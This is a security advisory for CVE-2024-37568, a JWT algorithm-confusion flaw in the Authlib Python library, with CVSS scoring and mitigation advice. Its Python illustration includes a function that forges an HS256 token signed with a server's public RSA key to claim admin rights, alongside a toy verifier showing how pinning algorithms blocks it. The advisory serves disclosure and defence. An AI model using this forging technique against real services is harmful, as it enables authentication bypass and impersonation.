Algorithm Confusion Vulnerability in Authlib by Lepture
CVE-2024-37568

7.5 HIGH

Key Information:

Vendor: Authlib
Status: Vendor
CVE Published: 9 June 2024

What is CVE-2024-37568?

Authlib, the Python OAuth and JOSE library maintained by Lepture, is vulnerable to algorithm confusion when an asymmetric public key is used to verify JSON Web Tokens. If jwt.decode is called without restricting the accepted algorithms, the alg value in the attacker-supplied token header decides how the key is interpreted: a token declaring HS256 is verified with HMAC keyed by the raw bytes of the RSA or EC public key. Since that key is public by design, anyone who can read it can mint tokens that pass verification and forge arbitrary claims, which is why the impact is rated as a full loss of integrity with no confidentiality or availability effect. The issue is the same class as CVE-2022-29217 (PyJWT) and CVE-2024-33663 (python-jose). Versions before 1.3.1 are affected; applications on earlier releases should pin the accepted algorithm list on every decode call instead of relying on the default.
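The confusion described above, as an added example that is not Authlib's own code: a standard-library Python model of a verifier that lets the token header choose the algorithm, the HS256 token an attacker forges from the server's published RSA public key, and the two checks that stop it. The decode and forge_hs256 functions, the strict flag and the placeholder PEM string are all constructed for this illustration; RSA verification itself is not modelled because the forged token never reaches it.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Sequence

# Constructed placeholder standing in for the RSA public key PEM a server loads
# and hands to its decode call. The key material is irrelevant to the attack:
# the key is published, so the attacker knows every byte the server will use.
RSA_PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAplaceholder000000000000\n"
    "-----END PUBLIC KEY-----\n"
)


def b64url(data: bytes) -> str:
    """JWT-style base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url; restores the padding JWT strips."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_hs256(claims: dict, hmac_secret: bytes) -> str:
    """Attacker side: an HS256 token whose HMAC key is the server's *public* key bytes."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(hmac_secret, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def decode(token: str, key: str, algorithms: Optional[Sequence[str]] = None,
           strict: bool = False) -> Optional[dict]:
    """Hypothetical verifier modelling the confused behaviour.

    algorithms=None mirrors a decode call with no algorithm restriction: the
    'alg' chosen by whoever minted the token decides how `key` is used.
    Returns the claims on success and None when the token is rejected.
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")

    # Hardening 1: pin the algorithm set before any key material is touched.
    if algorithms is not None and alg not in algorithms:
        return None

    if alg == "HS256":
        # Hardening 2 (defence in depth, this model's own guard): an HMAC keyed
        # with something that is plainly a PEM public key is never legitimate.
        if strict and key.lstrip().startswith("-----BEGIN"):
            return None
        signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
        expected = hmac.new(key.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
        return None
    if alg == "RS256":
        # Genuine RSA verification is out of scope for this model.
        raise NotImplementedError("RS256 verification not modelled here")
    return None


def demo() -> tuple:
    """Returns (confused_result, pinned_result, strict_result) for one forged token."""
    forged = forge_hs256({"sub": "admin", "role": "superuser"}, RSA_PUBLIC_KEY_PEM.encode())
    confused = decode(forged, RSA_PUBLIC_KEY_PEM)                        # accepted
    pinned = decode(forged, RSA_PUBLIC_KEY_PEM, algorithms=("RS256",))   # rejected
    strict = decode(forged, RSA_PUBLIC_KEY_PEM, strict=True)             # rejected
    return confused, pinned, strict


if __name__ == "__main__":
    print(demo())
```

In Authlib the algorithm pin corresponds to decoding with an instance restricted at construction time, JsonWebToken(['RS256']), rather than the module-level jwt object that is not tied to one algorithm; upgrading to 1.3.1 or later removes the vulnerable default, but pinning on every decode call remains good practice with any JWT library.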

References

CVSS V3.1

Score: 7.5
Severity: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: High
Availability: None

Timeline

  • Vulnerability published: 9 June 2024